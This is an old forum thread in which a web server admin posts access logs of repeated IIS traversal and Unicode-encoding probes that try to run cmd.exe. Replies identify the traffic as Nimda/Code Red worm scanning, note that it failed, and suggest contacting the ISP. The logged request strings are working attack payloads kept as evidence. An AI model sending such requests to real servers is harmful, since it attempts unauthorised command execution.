-
Whats he using... ?
For the past 17 hours, the same IP has been giving me the following log files on my web server:
[04/Mar/2003:00:39:16 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
[04/Mar/2003:00:39:18 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
[04/Mar/2003:00:39:19 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
[04/Mar/2003:00:39:20 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
[04/Mar/2003:00:39:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[04/Mar/2003:00:39:22 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
[04/Mar/2003:00:39:22 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
[04/Mar/2003:00:39:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
[04/Mar/2003:00:39:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:26 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:27 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
[04/Mar/2003:00:39:28 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
[04/Mar/2003:00:39:29 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
[04/Mar/2003:00:39:30 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[04/Mar/2003:00:39:31 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
He is obviously using a "tool" to do this, seeing how rapid the requests are, and the fact that hes been doing it pretty consistently over the past 17 hours... do any of you know what program he is using? I would think the logs would be a pretty tell tale sign of what he was using...
Also, if these attacks go on any longer, im going to want to take some kind of action against him. What steps would be plausable in this situation?
Thanks,
slick_shoes
-
Not completely sure, but this looks pretty much the same as another set of logs which have been posted just recently in another thread. You can find more information in the following threads:
Apache Security Question
hacked
-
Contact the person's ISP and give them the IP and the time table of the events. They'll choose their own course of action.
-
It's a pretty basic Nimca/code red automated thing..... See it all the time on my boxes.... If you are patched... which you appear to be by the 404 error codes in the log you have nothing to worry about......
Complaining to the ISP will become a full time job..... If it's not a pain for you go ahead and send the logs..... But it will become a problem if you host web sites....
-
Thanks for the replies...
Have a good day!
slick_shoes